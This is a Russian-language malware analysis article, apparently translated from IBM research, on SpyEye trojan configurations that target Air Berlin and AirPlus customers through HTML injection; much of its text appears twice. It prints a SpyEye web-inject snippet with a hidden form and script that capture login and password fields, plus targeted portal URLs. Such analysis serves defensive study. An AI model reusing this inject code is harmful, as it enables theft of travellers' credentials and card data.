IBM обнаружила конфигурацию SpyEye, предназначенную для пользователей двух ведущих европейских веб-сайтов о путешествиях авиакомпаний: Air Berlin, второй по величине авиакомпании в Германии после Lufthansa, и AirPlus, глобального поставщика услуг для деловых поездок для компаний. SpyEye использует машину пользователя, а не веб-сайты, для совершения этого мошенничества.
Туристические компании становятся мишенями для троянских программ
Эти две компании выбраны не случайно, но, как мы полагаем, тщательно отобраны с учетом их потенциального дохода от преступной деятельности. Один сайт принимает платежи дебетовыми картами, а другой обслуживает бизнес-пользователей.
Air Berlin, ныне шестая по величине авиакомпания Европы, не только принимает дебетовые и кредитные карты, но и позволяет гражданам Австрии, Нидерландов и Германии производить оплату прямым дебетом банка за семь дней до поездки. Это означает, что преступники, нацеленные на пассажира Air Berlin из этих стран, имеют хорошие шансы получить личные данные пользователей, включая дату рождения, которую пользователи должны указать на сайте авиакомпании, а также данные своего банковского счета.
AirPlus, тем временем, предлагает на своем веб-сайте разнообразные туристические услуги для компаний любого размера, оплачиваемые корпоративными платежными картами, которые неизменно привязаны к корпоративным банковским счетам.
Поскольку на корпоративных счетах, как правило, присутствуют более высокие балансы или кредитные лимиты, чем на потребительских счетах, они имеют гораздо больший потенциал для сбора данных и, следовательно, дохода для киберпреступников.
Сбор данных с помощью HTML-инъекции
В случае атаки Air Berlin SpyEye пытается собрать конфиденциальную информацию о пользователях, включая имя пользователя и пароль, а также другие данные, которые вводятся на целевой веб-странице. Поскольку Air Berlin принимает платежи по банковским дебетовым картам, вероятность мошенничества еще выше.
Код внедрения SpyEye фиксирует информацию об имени пользователя и пароле:
Между тем методология атаки AirPlus нацелена на пользователей кредитной карты Lufthansa Miles & More Visa, которая предлагает бонусные поездки за покупки, сделанные с использованием карты.
Подобно атаке Air Berlin, код SpyEye нацелен на основной URL-адрес входа на портал AirPlus:
В этом случае SpyEye внедряет код, который утверждает, что это усовершенствование защиты от мошенничества, в веб-браузер пользователя.
На самом деле, конечно, это искусно замаскированная попытка фишинга учетных данных ничего не подозревающего клиента веб-портала AirPlus. Эти учетные данные являются достаточно полными и включают имя и номер карты, дату истечения срока действия, номер CVV (полосы подписи) и, как и в случае с атакой Air Berlin, дату рождения пользователя.
Сбор даты рождения пользователя открывает возможность кражи личных данных и, как мы заметили, совершения мошенничества, выдавая себя за пользователя или используя методы социальной инженерии.
Выводы
Важно понимать, что киберпреступность сейчас носит высокоорганизованный характер со специализацией обязанностей, возложенных на разных членов преступной иерархии. Это означает, что банды разработчиков темного программного обеспечения, стоящие за вариантами SpyEye, теперь тщательно выбирают свои цели для получения максимального дохода с минимальными усилиями. Вдобавок, увеличивая количество мошеннических данных от каждой жертвы, возможности перепродажи данных выходят далеко за рамки возможностей форумов кардеров, наблюдавшихся в последние несколько лет.
Мы полагаем, что киберпреступные банды, стоящие за атаками, почти наверняка используют полуавтоматическую методологию разработки кода, что позволяет им разрабатывать индивидуализированные версии вредоносного ПО для конкретных целей.
Очевидно, что торговля путешествиями предлагает киберпреступникам доступ к учетным данным пользователей и компаний с большими, чем обычно, остатками на счетах и лимитами по кредитным картам. Получение доступа к реквизитам банковских счетов Air Berlin в Австрии, Германии и Нидерландах является показателем изобретательности.
К сожалению, традиционные механизмы антивирусной безопасности в значительной степени неспособны защитить корпоративных пользователей от заражений SpyEye, поскольку вредоносная программа использует целевую разведку в сочетании с методами уклонения от обнаружения сигнатур, чтобы закрепиться внутри компьютеров.
Лучшей альтернативой для защиты веб-сервисов от превращения в троянские программы является безопасный доступ в Интернет. Например, инструменты на основе браузера, которые защищают связь между компьютером и веб-сайтом поставщика облачных услуг, могут предотвратить захват данных обычными методами атаки, такими как HTML-инъекция и кейлоггинг. Эти же технологии могут защищать другие приложения на базе браузера, такие как VPN, CRM, розничные, финансовые системы и системы совместной работы, которые вредоносное ПО может использовать для кражи учетных данных пользователя и нарушения периметра безопасности предприятия полностью незамеченным.
В ближайшее время мы ожидаем увидеть более специализированные версии SpyEye.
Туристические компании становятся мишенями для троянских программ
Эти две компании выбраны не случайно, но, как мы полагаем, тщательно отобраны с учетом их потенциального дохода от преступной деятельности. Один сайт принимает платежи дебетовыми картами, а другой обслуживает бизнес-пользователей.
Air Berlin, ныне шестая по величине авиакомпания Европы, не только принимает дебетовые и кредитные карты, но и позволяет гражданам Австрии, Нидерландов и Германии производить оплату прямым дебетом банка за семь дней до поездки. Это означает, что преступники, нацеленные на пассажира Air Berlin из этих стран, имеют хорошие шансы получить личные данные пользователей, включая дату рождения, которую пользователи должны указать на сайте авиакомпании, а также данные своего банковского счета.
AirPlus, тем временем, предлагает на своем веб-сайте разнообразные туристические услуги для компаний любого размера, оплачиваемые корпоративными платежными картами, которые неизменно привязаны к корпоративным банковским счетам.
Поскольку на корпоративных счетах, как правило, присутствуют более высокие балансы или кредитные лимиты, чем на потребительских счетах, они имеют гораздо больший потенциал для сбора данных и, следовательно, дохода для киберпреступников.
Сбор данных с помощью HTML-инъекции
В случае атаки Air Berlin SpyEye пытается собрать конфиденциальную информацию о пользователях, включая имя пользователя и пароль, а также другие данные, которые вводятся на целевой веб-странице. Поскольку Air Berlin принимает платежи по банковским дебетовым картам, вероятность мошенничества еще выше.
Код внедрения SpyEye фиксирует информацию об имени пользователя и пароле:
Code:
<WebInjects action = "Inject | POST | GET"> <Url> <! [CDATA [https://www.airberlin.com/site/yab/login/login*]]> </Url> <AuxUrl> <! [CDATA []]> </AuxUrl> <WebInject> <Before> <! [CDATA [<body>]]> </Before> <Data> <! [CDATA [<iframe name = ifr1 id = ifr1 src = " https://www.airberlin.com/site/images/spacer.gif "width = 0 height = 0 border = none> </iframe> <form id = form7 name = form7 target = ifr1 method = post action =" https : //www.airberlin.com/site/images/spacer.gif "> <input type =" hidden "name =" cc "id =" cc "/> <input type =" hidden "name =" pas "id = "pas" /> </form> <script> function dosubmit () {document.form7.cc.value = document.getElementById ('login'). value; document.form7.pas.value = document.getElementById ('pass'). value; document.form7.submit ();} </script>]]> </Data> <After> <! [CDATA []]> </After> </ WebInject> <WebInject> <Before> <! [CDATA [name = "yabLogin" id = "yabLogin"]]> </Before> <Data> <! [CDATA [onclick = "dosubmit ()"]]> </ Данные> <After> <! [CDATA []]> </After> </WebInject>Между тем методология атаки AirPlus нацелена на пользователей кредитной карты Lufthansa Miles & More Visa, которая предлагает бонусные поездки за покупки, сделанные с использованием карты.
Подобно атаке Air Berlin, код SpyEye нацелен на основной URL-адрес входа на портал AirPlus:
Code:
<mark data-hasqtip = "true" class = "tempMark"> <Url> <! [CDATA [https://portal.airplus.com/welcome*]]> </Url> <Url> <! [CDATA [ https://www.miles-and-more.kartenabrechnung.de/welcome*]]> </Url> </mark>В этом случае SpyEye внедряет код, который утверждает, что это усовершенствование защиты от мошенничества, в веб-браузер пользователя.
На самом деле, конечно, это искусно замаскированная попытка фишинга учетных данных ничего не подозревающего клиента веб-портала AirPlus. Эти учетные данные являются достаточно полными и включают имя и номер карты, дату истечения срока действия, номер CVV (полосы подписи) и, как и в случае с атакой Air Berlin, дату рождения пользователя.
Сбор даты рождения пользователя открывает возможность кражи личных данных и, как мы заметили, совершения мошенничества, выдавая себя за пользователя или используя методы социальной инженерии.
Выводы
Важно понимать, что киберпреступность сейчас носит высокоорганизованный характер со специализацией обязанностей, возложенных на разных членов преступной иерархии. Это означает, что банды разработчиков темного программного обеспечения, стоящие за вариантами SpyEye, теперь тщательно выбирают свои цели для получения максимального дохода с минимальными усилиями. Вдобавок, увеличивая количество мошеннических данных от каждой жертвы, возможности перепродажи данных выходят далеко за рамки возможностей форумов кардеров, наблюдавшихся в последние несколько лет.
Мы полагаем, что киберпреступные банды, стоящие за атаками, почти наверняка используют полуавтоматическую методологию разработки кода, что позволяет им разрабатывать индивидуализированные версии вредоносного ПО для конкретных целей.
Очевидно, что торговля путешествиями предлагает киберпреступникам доступ к учетным данным пользователей и компаний с большими, чем обычно, остатками на счетах и лимитами по кредитным картам. Получение доступа к реквизитам банковских счетов Air Berlin в Австрии, Германии и Нидерландах является показателем изобретательности.
К сожалению, традиционные механизмы антивирусной безопасности в значительной степени неспособны защитить корпоративных пользователей от заражений SpyEye, поскольку вредоносная программа использует целевую разведку в сочетании с методами уклонения от обнаружения сигнатур, чтобы закрепиться внутри компьютеров.
Лучшей альтернативой для защиты веб-сервисов от превращения в троянские программы является безопасный доступ в Интернет. Например, инструменты на основе браузера, которые защищают связь между компьютером и веб-сайтом поставщика облачных услуг, могут предотвратить захват данных обычными методами атаки, такими как HTML-инъекция и кейлоггинг. Эти же технологии могут защищать другие приложения на базе браузера, такие как VPN, CRM, розничные, финансовые системы и системы совместной работы, которые вредоносное ПО может использовать для кражи учетных данных пользователя и нарушения периметра безопасности предприятия полностью незамеченным.
В ближайшее время мы ожидаем увидеть более специализированные версии SpyEye.
